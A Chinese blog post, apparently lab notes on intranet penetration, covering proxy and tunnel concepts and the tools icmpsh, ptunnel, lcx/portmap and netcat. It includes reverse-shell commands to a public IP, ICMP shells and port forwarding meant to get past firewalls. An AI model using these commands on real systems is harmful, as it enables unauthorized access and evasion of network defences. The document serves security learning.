我的内网渗透-代理转发(1)

 概念

网关
        必须经过
            用来进行路由转发的设备,网关的作用是让不同网段之间能够通信

代理
        委托访问
            无论代理后面挂了几台设备,都认为是从代理进行访问,对外只表现为代理一台。外部认为是与代理进行交互 

隧道
        网络虫洞
            隧道是一个网络的虚拟路径,使得入口的数据能够穿越到隧道的出口进行通信

代理与NAT的区别

Ⅰ 从应用上讲, NAT 设备是网络基础设备之一, 解决的是IP不足的问题,代理服务器则是更贴近具体应用,比如: 通过代理服务器进行”翻墙”, 另外像迅游这样的加速器, 也是使用代理服务器实现的 
					
Ⅱ 从底层实现上讲, NAT 是工作在网络层的, 直接对IP地址进行替换
代理服务器往往工作在应用层
					
Ⅲ 使用范围上讲, NAT 一般在局域网的出口部署
代理服务器可以在局域网做, 也可以在广域网做, 也可以跨网
					
Ⅳ从部署位置上看, NAT 一般集成在防火墙, 路由器等硬件设备上

代理服务器则是一个软件程序, 需要部署在服务器上
					
Ⅴ 从功能上讲,proxy=代理商,先要看你买啥,清楚了后再帮你买,可能直接从库房中提货,也可能去其它地方调货,也有可能不代理你要买的货。Proxy针对每一种应用设置代理服务器,或者安装一个客户端软件,设置相对复杂一些.并且并不一定支持所有的应用,如VPN客户端登录很多Proxy就无法代理应用. 
					
nat=货运码头,管你是啥货,只管发就是了,NAT设置简单,无需客户端软件

 

icmpsh

安装

下载地址

https://github.com/bdamele/icmpsh

环境安装

#之前安装过pip2的话直接安装这个就可以 省去其他步骤

pip2 install impacket -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn/simple
#安装需要的python库文件   




#没安装过的pip2的情况
把可执行程序放到/usr/bin/目录下, 可以快速启用(可以重命名)
需要在同网段下去做, 如果端口受到限制, 那我们就可以用ICMPSH这款工具去反弹shell
前提: ping未被禁用
依赖环境: python-impacket(python2版本的) 
pip install --upgrade pip 
pip install --upgrade setuptools
pip2 install impacket -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn/simple   

参数

-h 帮助
	
-t target --> 目标IP地址
	
-d delay 500 --> 延迟的毫秒数
	
-s bytes  128 --> 缓冲区的大小
	
-b max blank 30 --> 最大的空白数(未应答的ICMP请求最大数量)

使用方法

1. 现在kali设置ping代替应答 (必做)

sysctl -w net.ipv4.icmp_echo_ignore_all=1 
#sysctl:动态地修改内核的运行参数

2. 开启监听

python2 icmpsh_m.py s_ip d_ip (在kali上)
#icmpsh_m.py 192.168.0.105 192.168.0.102
#得用python2,不然会报错

3. 反弹shell

icmpsh.exe -t kali地址 -d 500 -s 128 -b 30 (在靶机上)
#icmpsh.exe -t 192.168.0.105 -d 500 -s 128 -b 30
#直接加上-t就可以运行,其他参数可要可不要

4.做完之后改回代替应答, 不然会出现ping不通其他主机的情况

sysctl -w net.ipv4.icmp_echo_ignore_all=0

ptunnel

环境准备
		kali、跳板机Ubuntu、win7 ---kali内置有Ptunnel
		Uubuntu: Ptunnel文件赋予权限即可
		Ubuntu:两张网卡、一张nat、一张仅主机,win7:仅主机,kali:NAT模式
		vm: vmnet0(桥接, 连通物理网段, 与物理机处于同一网段), vmnet1(仅主机模式, 只能ping通同一网段的机器) , vmnet8(nat)

		

		

参数

-p: 同网段远程服务器的ip地址(跳板ip)
		
-lp: 本地监听的端口(本地监听的端口)
		
-da: 目标的ip
		
-dp: 目标的端口
		
-x: 添加密码
		
-v: 显示详细的参数信息

操作

kali:ptunnel -x 12345 -p 192.168.21.132 -lp 6666 -da 192.168.48.138 -dp 3389
		
跳板机: ptunnel -x 12345
		
访问目标机: rdesktop 127.0.0.1:6666

报错

得把这个身份验证取消掉,不然会报错

报错信息:Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).

 LCX

环境准备

        KALI、跳板机、win7

参数

-listen 本地监听的端口(51)  要转发的端口(3389)
		
-slave 连接ip(跳板机ip) 连接的端口(51) 要传输的ip(127.0.0.1) 要转发的端口(3389)
		
-tran 用于做多层跳板的

使用方法 

跳板机

#Windows: 
lcx.exe -listen 1234 4321  
			
#Linux:
cd /home/kali/Desktop/lcx_vuln.cn_/lcx_vuln.cn 
#进入到lcx文件夹

#kali
./portmap -m 2 -p1 1234 -p2 4321
#开始监听1234传来的数据,然后监听4321端口提供访问

#windows
lcx -listen 3333 2222

内网主机 

lcx.exe -slave 192.168.150.129(跳板机地址) 1234 127.0.0.1 3389/80/21
			
lcx.exe -slave 跳板机地址 跳板机的第一个端口 127.0.0.1 需要转发的本机端口
#将本机的3389端口转发给192.168.150.129的1234端口

访问 

mstsc 跳板机ip:4321
		
rdesktop 跳板机ip:4321
		
浏览器->跳板机:4321

 绕过防火墙思路

lcx -tran 53 肉鸡ip 3389
#由于3389可能被防火墙限制,可以换成其他端口

让任意主机可以通过连接公网连接靶机的内网

./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 8888
#监听来自6666端口的请求,将其转发到8888端口

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 123.56.167.72 -p2 6666
#将内网主机22端口的流量转发到公网主机的6666端口上
#这一步报错的话可能就是自己的ssh服务没打开。我的kali服务是没有打开的,所以被连接的时候就会报错。也有可能是没有安装这个ssh-server

ssh 用户名@公网ip -p 8888
#在任意主机使用ssh连接8888端口,就可以连接到内网主机

NC

常用参数

-c | -e: 执行命令或者程序,常用于反弹shell
		 
-l:使用监听模式
		 
-p:设定端口
		 
-z:使用0输入输出,常用于端口开放检测,(连上立即断开)
		 
-v -vv:  显示执行过程详细信息   /   更详细的信息
		 
-n:仅显示数字的ip地址,不显示DNS信息

环境准备

        Kali,跳板机(windosw7)、客户端 

使用方法 

服务端

nc -lvvp 4321

跳板机

要windows,如果使用linux可能会出现问题。靶机和跳板机的类型要求要一样的

nc -v 192.168.200.129 4321 -e "C:\Users\hackbiao\Desktop\netcat-win32-1.12\nc.exe -v 192.168.150.131 4444"
#端口一定要跟上 不然会报错

 客户端

客户端 Linux- >    ./nc -lvvp 5555 -e /bin/bash
			
客户端  Windows->   nc.exe -lvvp 4444 -e cmd  

注意

        因为这里有一个中间代理进行转发,所以获取会话的速度较慢。连接成功之后dir什么的都没有反应,可以先查看systeminfo,这样字命令行就恢复了正常。

使用公网监听内网主机

反向连接

在公网主机开启监听

nc -lvvp 4444

再内网主机执行

nc -t -e cmd.exe 公网ip 4444
#加不加-t参数都是可以的
#-e后面跟上的是要弹出去命令,跟上powershell也是可以的

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/31644.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

css小兔鲜项目搭建

目录 精灵图 精灵图的使用步骤 背景图片大小 background连写 文字阴影 盒子阴影 过渡 骨架标签 SEO三大标签 版心的介绍 css书写顺序 项目结构搭建 精灵图 场景:项目中将多张小图片,合并成一张大图片,这张大图片称之为精灵图 优点…

机器人项目创新课题汇总提示

创新课题推荐自己思考并给出,如下案例仅供参考: 不想看,不愿意做,就遵循自己内心想法,做自己喜欢的事情吧。 题目和描述: 自动导航机器人:设计一种能够自主导航的机器人,可以在不需…

pgsql序列的使用

大家都知道pgsql和mysql不同,mysql字段有有自增属性,pgsql并没有,但是pgsql和oracle一样有序列,很多人刚接触pgsql的时候,并不知道序列是什么,怎么用,下面这篇文章就介绍序列,并且怎…

idea如何集成Tomcat

(1)、这里应该找Add Configuration点击这里:如果没有标志,点击Exit (2)、这里可以配置一个配置项: (3)、loacl是本地,那个是远程:这里我选择本地 (4&#xff…

DJ4-4 NAT、ICMP、IPv6

目录 一、NAT:网络地址转换 1、工作原理 2、NAT 的限制 二、ICMP 1、ICMP 协议 2、ICMP 类型和代码 3、Traceroute 命令 三、IPv6 地址 1、IPv6 的引入 2、IPv6 的表示 一、NAT:网络地址转换 动机:对外部网络来讲,本地…

11-高性能JSON库——fastjson2

目录 1.具体使用 1.1.添加fastjson2依赖 1.2.常用类和方法 1.3.将JSON字符串转换成对象 1.3.1.JSON字符串转换成对象 1.3.2.JSON字符串转换成数组 1.4.将对象转换成JSON字符串 1.4.1.将对象转换成JSON字符串 1.4.2.将数组转换成 JSON 字符串 2.性能测试报告 3.总结 …

Prompt Engineering 面面观

作者:紫气东来 项目地址:https://zhuanlan.zhihu.com/p/632369186 一、概述 提示工程(Prompt Engineering),也称为 In-Context Prompting,是指在不更新模型权重的情况下如何与 LLM 交互以引导其行为以获得…

总结905

今日已做: 1.核聚课程 2.进步本回顾,重做8道题,有两道还没掌握,记录3页。 3.线性代数第5讲 4.三大计算,刷题15道,纠错。 5.每日长难句。 6.考研常识课 明日必做 1.熟练背诵《the king’s speech》并默写 2…

字符设备驱动内部实现原理解析

字符设备驱动内部实现原理解析 一. 字符设备驱动对象内部实现原理解析二. 字符设备驱动的注册流程三. 代码示例 一. 字符设备驱动对象内部实现原理解析 用户层: ​ 当用户打开(open)一个文件时,会生成一个文件描述符表 内核层: 内…

spark 和 flink 的对比

一、设计理念 Spark 的数据模型是 弹性分布式数据集 RDD(Resilient Distributed Dattsets),这个内存数据结构使得spark可以通过固定内存做大批量计算。初期的 Spark Streaming 是通过将数据流转成批 (micro-batches),即收集一段时间(time-window)内到达的…

SD/StableDiffusion模型,ai绘画部署教程,谷歌云端零成本部署,支持中文

目录 前言 准备前提 说明 开始搭建 1、第一步,下载ipynb脚本文件 2、第二步,上传一键脚本文件到谷歌云盘 3、选择该.ipynb文件--右键--打开方式--关联更多应用 4、输入框搜索Colaboratory找到该应用,安装 5、安装过程中,…

Linux网络基础

网络基础 认识 "协议"网络协议初识协议分层OSI七层模型TCP/IP五层(或四层)模型 网络传输基本流程网络传输流程图数据包封装和分用 网络中的地址管理认识IP地址认识MAC地址 认识 “协议” “协议” 是一种约定。 举个栗子,你和好友之间提前约好在某个地方…

第九章 形态学图像处理

文章目录 9形态学图像处理9.1预备知识9.2腐蚀与膨胀9.2.1腐蚀9.2.2膨胀9.2.3对偶性 9.3开操作和闭操作9.4击中或击不中变换9.5一些基本形态学方法9.5.1边界提取9.5.2空洞填充9.5.3连通分量的提取9.5.4凸壳9.5.5细化9.5.6粗化 9.6灰度级形态学9.6.3一些基本的形态学算法 9形态学…

kotlin从入门到精通之内置类型

基本类型 声明变量 val(value的简写)用来声明一个不可变的变量,这种变量在初始赋值之后就再也不能重新赋值,对应Java中的final变量。 var(variable的简写)用来声明一个可变的变量,这种变量在初始…

C51单片机期末复习第八章单片机接口技术

一 总线: 传送同类信息的连线 三总线: 地址总线AB,数据总线DB,控制总线CB 目录(ppt给的没啥用,乱还不全): 8.1 单片机的系统总线 8.2 简单并行I/O口扩展 8.3 可编程并行I/O口扩展 8.4 D/A转换与DAC0832应用 8…

衣服面料相关基础

总结自 BiliBili视频:原来衣服的面料还能这么选,几个方法教你买到优质的短袖,再也不怕买衣服踩坑了 面子里子 既不能皱巴巴 又不能不透气 混纺 涤纶 粘纤 氨纶 涤纶 不变性 挺阔感 氨纶 弹性 粘纤 吸水透气40-50% 怕热 真丝与亚麻 …

【python】js逆向基础案例——有道翻译

前言 嗨喽,大家好呀~这里是爱看美女的茜茜呐 课程亮点: 1、爬虫的基本流程 2、反爬的基本原理 3、nodejs的使用 4、抠代码基本思路 环境介绍: python 3.8 pycharm 2022专业版 >>> 免费使用教程文末名片获取 requests >>> pip install req…

软件设计原则与设计模式

设计中各各原则同时兼有或冲突,不存在包含所有原则的设计 一:单一职责原则又称单一功能原则 核心:解耦和增强内聚性(高内聚,低耦合) 描述:类被修改的几率很大,因此应该专注于单一的…

Android 窗口实现原理

一、基本概念 1、窗口显示架构图 多窗口的核心原理其实就是分栈和设置栈边界2、Android的窗口分类 Android应用程序窗口,这个是最常见的(拥有自己的WindowToken)譬如:Activity与Dialog Android应用程序子窗口(必须依附到其他非子窗口才能存…

【刷题笔记】牛客网:链表指定区间内反转

【刷题笔记】牛客网:链表指定区间内反转 一、题目描述及示例 二、思路分析 1、首先,我们来定义一个虚拟的头节点tempHead(原因:如果从第一个位置开始反转,则可以不用进行特殊情况考虑),并使te…